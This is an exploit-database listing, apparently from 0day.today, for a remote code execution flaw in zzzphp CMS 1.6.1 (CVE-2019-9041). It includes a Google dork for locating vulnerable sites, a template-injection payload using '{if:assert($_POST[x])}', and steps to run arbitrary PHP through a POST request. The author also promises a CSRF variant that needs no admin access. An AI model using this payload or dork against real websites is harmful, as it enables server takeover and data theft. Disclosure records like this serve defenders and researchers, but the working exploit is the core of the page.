Lucene search
Yang Chenglong1337DAY-ID-32272HistoryFeb 25, 2019 - 12:00 a.m.
zzzphp CMS 1.6.1 - Remote Code Execution Vulnerability
2019-02-2500:00:00
Yang Chenglong
0day.today
68
0.014 Low
EPSS
Percentile
85.0%
Exploit for php platform in category web applications
# Exploit Title: dynamic code evaluation of zzzphp cms 1.6.1
# Google Dork: intext:"2015-2019 zzcms.com"
# Date: 24/02/2019
# Exploit Author: Yang Chenglong
# Vendor Homepage: http://www.zzzcms.com/index.html
# Software Link: http://115.29.55.18/zzzphp.zip
# Version: 1.6.1
# Tested on: windows/Linux,iis/apache
# CVE : CVE-2019-9041
Due to the failure of filtering function parserIfLabel() in inc/zzz_template.php, attackers can insert dynamic php code into the template file and leads to dynamic code evaluation.
Exploit:
login in to the admin panel, edit the template of search.html, insert the following code:
{if:assert($_POST[x])}phpinfo();{end if}
Visit the http://webroot/search/ and post data βx = phpinfo();β, the page will execute the php code βphpinfo()β as follow:
[1.png]
Remarks:
While the above exploit requires attackers to have the access to the admin panel, I will post another exploit by using csrf to acquire the control of website without access to the admin panel.
# 0day.today [2019-03-05] #Related
packetstorm
packetstorm
ZZZPHP CMS 1.6.1 Remote Code Execution
2019-02-25 00:00:00
zzzphp CMS 1.6.1 Cross Site Request Forgery
2019-03-04 00:00:00
prion
prion
Code injection
2019-02-23 18:29:00
exploitpack
exploitpack
zzzphp CMS 1.6.1 - Remote Code Execution
2019-02-25 00:00:00
zzzphp CMS 1.6.1 - Cross-Site Request Forgery
2019-03-04 00:00:00
nuclei
nuclei
ZZZCMS 1.6.1 - Remote Code Execution
2021-02-10 11:09:46
cve
cve
CVE-2019-9041
2019-02-23 18:29:00
exploitdb
exploitdb
zzzphp CMS 1.6.1 - Remote Code Execution
2019-02-25 00:00:00
zzzphp CMS 1.6.1 - Cross-Site Request Forgery
2019-03-04 00:00:00